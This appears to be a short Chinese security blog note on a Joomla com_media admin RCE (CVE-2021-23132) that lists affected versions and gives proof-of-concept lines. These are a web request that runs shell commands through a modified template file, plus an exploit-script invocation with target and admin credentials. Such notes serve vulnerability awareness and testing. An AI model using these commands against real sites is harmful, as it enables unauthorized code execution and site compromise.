Joomla com_media 后台 RCE (CVE-2021-23132)

# Joomla com_media 后台 RCE (CVE-2021-23132)

影响版本:

Joomla core <=3.9.24 * CVE-2021-23132 com_media allowed paths that are not intended for image uploads to RCE. * CVE-2020-24597 Directory traversal in com_media to RCE 步骤: 获取超级管理员权限,触发RCE。 **PoC:** ``` http://target/templates/protostar/error.php?cmd=ls python3 cve-2021-23132.py -url http://192.168.72.140 -u admin -p 1234 -rce 1 -cmd ls ``` poc.py:https://github.com/HoangKien1020/CVE-2021-23132

© 版权声明
THE END
喜欢就支持一下吧
点赞0 分享
评论 抢沙发

请登录后发表评论

    请登录后查看评论内容